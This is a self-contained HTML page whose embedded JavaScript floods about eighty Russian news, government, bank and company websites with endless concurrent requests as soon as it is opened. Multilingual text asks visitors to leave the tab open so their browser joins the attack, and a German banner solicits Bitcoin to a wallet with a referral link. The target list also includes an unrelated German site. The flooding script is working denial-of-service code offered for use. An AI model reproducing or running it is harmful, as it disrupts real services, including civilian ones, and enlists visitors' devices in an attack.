<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <title>Russia HTML DoS</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
	<div style="font-weight:bold;font-size:20px; background:red; color:white">
		<h2>Unterstützen Sie unsere Arbeit gegen das russische Kriegsverbrecher-Regime</h2>
			<h3>Neue Maßnahmen und Aktionen benötigen Ihre Unterstützung</h3>
			<p>Aufgrund der Sicherheitslage - auch in Europa - können wir nur Bitcoin Zahlungen entgegennehmen. Jeder Euro hilft,
			   Maßnahmen gegen Russland auf den Weg zu bringen.</p>
			<p>Sie möchten Spenden? Senden Sie Ihre Bitcoin Zahlung an: <b>bc1q6ythf97ea2f73k2nrh3gfe6qtr28lmmsl5dqvr</b></p>
		<h3>Sie haben keine Bitcoins und möchten uns unterstüzen</h3>
			<p>Legen Sie sich ein kostenfreies Bitcoin-Wallet auf <a href="https://bit2me.com/register?r=E1S-T8F-R6E">Bit2Me</a> an und laden
				Sie Ihre Wallet mit Ihrer Kreditkarte oder per Banküberweisung auf.</p>
			<p>Nach Gutschrift in der Wallet beachten Sie die Anweisungen auf 
				<a href="https://support.bit2me.com/de/support/solutions/articles/35000180487-wie-kann-man-kryptow%C3%A4hrungen-%C3%BCber-bit2me-pay-versenden-">										https://support.bit2me.com/de/support/solutions/articles/35000180487-wie-kann-man-kryptow%C3%A4hrungen-%C3%BCber-bit2me-pay-versenden-</a>
				 und geben als Empfangsadresse <b>bc1q6ythf97ea2f73k2nrh3gfe6qtr28lmmsl5dqvr</b> ein.</p>

	</div>
    <ul>
        <li>
            <h3>English version</h3>
            <p class="sub">For security concerns, you are able to simply save the webpage, and run locally - as well as
                view the
                source. It
                is
                entirely HTML and browser interpreted.</p>
            <p class="sub">The "official" news in russian federation are all fake and we believe it is better to shut
                them down!</p>
            <p class="sub">Please, just open this page and let it be open on your devices, it will flood the web-sites
                and pose a
                huge load
                on
                their infrastructure</p>
        </li>
        <li>
            <h3 class="sub">Русская версия</h3>
            <p class="sub">"Официальные" новости в рф - это театр абсурда и мы считаем, что это нужно остановить!</p>
            <p class="sub">Пожалуйста, просто откройте эту страницу на своём компьютере и оставтье вкладку открытой, она
                будет
                автоматически
                нагружать сайты российской пропаганды.</p>
        </li>
        <li>
            <h3 class="sub">Українська версія</h3>
            <p class="sub">Офіційні новини в рф - це театр абсурду і ми вважаємо, що це треба зупинити!</p>
            <p class="sub">Будь ласка, просто залиште відкритою цю сторінку на своєму комп'ютері щоб вона автоматично
                навантажувала
                сайти
                російської пропаганди.</p>
        </li>

    </ul>
    
    <h3 class="desc">Here is the stats of your session (the links and the number of the requests that were sent from
        your
        browser):<br>
        Failed to fetch is normal - if any site has that - that means their servers are under load and are dropping
        packets - which is the goal!</h3>
    <div id="stats" class="stats">
        <pre>
        {
            "ria.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "gazeta.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "kp.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "riafan.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "pikabu.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "kommersant.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "mk.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "yaplakal.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "rbc.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
            "bezformata.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        }, 
        "https://gazprom.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://lukoil.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://magnit.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nornickel.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://surgutneftegas.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://tatneft.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://evraz.com/ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nlmk.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://sibur.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://severstal.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://metalloinvest.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nangs.org": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://rmk-group.ru/ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://tmk-group.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://ya.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://polymetalinternational.com/ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://uralkali.com/ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://eurosib.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://omk.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://sberbank.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://vtb.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://gazprombank.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://gosuslugi.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://mos.ru/uslugi": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://kremlin.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://government.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://mil.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nalog.gov.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://customs.gov.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://pfr.gov.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://rkn.gov.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://lenta.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://ria.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://ria.ru/lenta/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.rbc.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.rt.com/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "http://en.kremlin.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://smotrim.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://tass.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://tvzvezda.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://vsoloviev.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.1tv.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.vesti.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://online.sberbank.ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://iz.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://ukraina.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.gazprom.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://lukoil.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://magnit.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.nornickel.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.surgutneftegas.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.tatneft.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.evraz.com/ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://nlmk.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.sibur.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.severstal.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.metalloinvest.com": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.tmk-group.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.polymetalinternational.com/ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.uralkali.com/ru/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.eurosib.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.sberbank.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.vtb.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.gazprombank.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.gosuslugi.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.mos.ru/uslugi/": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "http://kremlin.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "http://government.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        },
        "https://www.nalog.gov.ru": {
            "number_of_requests": 0,
            "number_of_errored_responses": 0,
            "error_message": "Failed to fetch"
        }
    }</pre>
    </div>
    <div id="errors"></div>
    <h1>If you missed it, BBC NEWS: Ukraine conflict: <a href="https://www.bbc.com/news/world-europe-60503037">Russian
            forces attack from three sides</a></h1>
    <script>
        var targets = {
            'https://ria.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://gazeta.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://kp.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://riafan.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://pikabu.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://kommersant.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://mk.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://yaplakal.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://rbc.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://bezformata.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://gazprom.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://lukoil.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://magnit.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nornickel.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://surgutneftegas.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://tatneft.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://evraz.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nlmk.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://sibur.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://severstal.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://metalloinvest.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nangs.org': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://rmk-group.ru/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://tmk-group.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://ya.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://polymetalinternational.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://uralkali.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://eurosib.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://omk.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://sberbank.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://vtb.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://gazprombank.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://gosuslugi.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://mos.ru/uslugi': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://kremlin.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://government.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://mil.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nalog.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://customs.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://pfr.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://rkn.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://lenta.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://ria.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://ria.ru/lenta/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.rbc.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.rt.com/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'http://en.kremlin.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://smotrim.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://tass.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://tvzvezda.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://vsoloviev.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.1tv.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.vesti.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://online.sberbank.ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://iz.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://ukraina.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.gazprom.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://lukoil.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://magnit.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.nornickel.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.surgutneftegas.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.tatneft.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.evraz.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://nlmk.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.sibur.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.severstal.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.metalloinvest.com': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.tmk-group.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.polymetalinternational.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.uralkali.com/ru/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.eurosib.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.sberbank.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.vtb.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.gazprombank.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.gosuslugi.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.mos.ru/uslugi/': { number_of_requests: 0, number_of_errored_responses: 0 },
            'http://kremlin.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'http://government.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://bemotion-360.de': { number_of_requests: 0, number_of_errored_responses: 0 },
            'https://www.nalog.gov.ru': { number_of_requests: 0, number_of_errored_responses: 0 },
       }

        var statsEl = document.getElementById('stats');
        function printStats() {
            statsEl.innerHTML = '<pre>' + JSON.stringify(targets, null, 2) + '</pre>'
        }
        setInterval(printStats, 100);

        var CONCURRENCY_LIMIT = 100
        var queue = []

        async function fetchWithTimeout(resource, options) {
            const controller = new AbortController();
            const id = setTimeout(() => controller.abort(), options.timeout);
            return fetch(resource, {
                signal: controller.signal
            }).then((response) => {
                clearTimeout(id);
                return response;
            }).catch((error) => {
                clearTimeout(id);
                throw error;
            });
        }

        async function flood(target) {
            while (true) {
                if (queue.length > CONCURRENCY_LIMIT) {
                    await queue.shift()
                }
                queue.push(
                    fetchWithTimeout(target, { timeout: 1000 })
                        .catch((error) => {
                            if (error.code === 20 /* ABORT */) {
                                return;
                            }
                            targets[target].number_of_errored_responses++;
                            targets[target].error_message = error.message
                        })
                        .then((response) => {
                            if (response && !response.ok) {
                                targets[target].number_of_errored_responses++;
                                targets[target].error_message = response.statusText
                            }
                            targets[target].number_of_requests++;
                        })


                )
            }
        }

        //Start
        Object.keys(targets).map(flood)
    </script>
</body>
</html>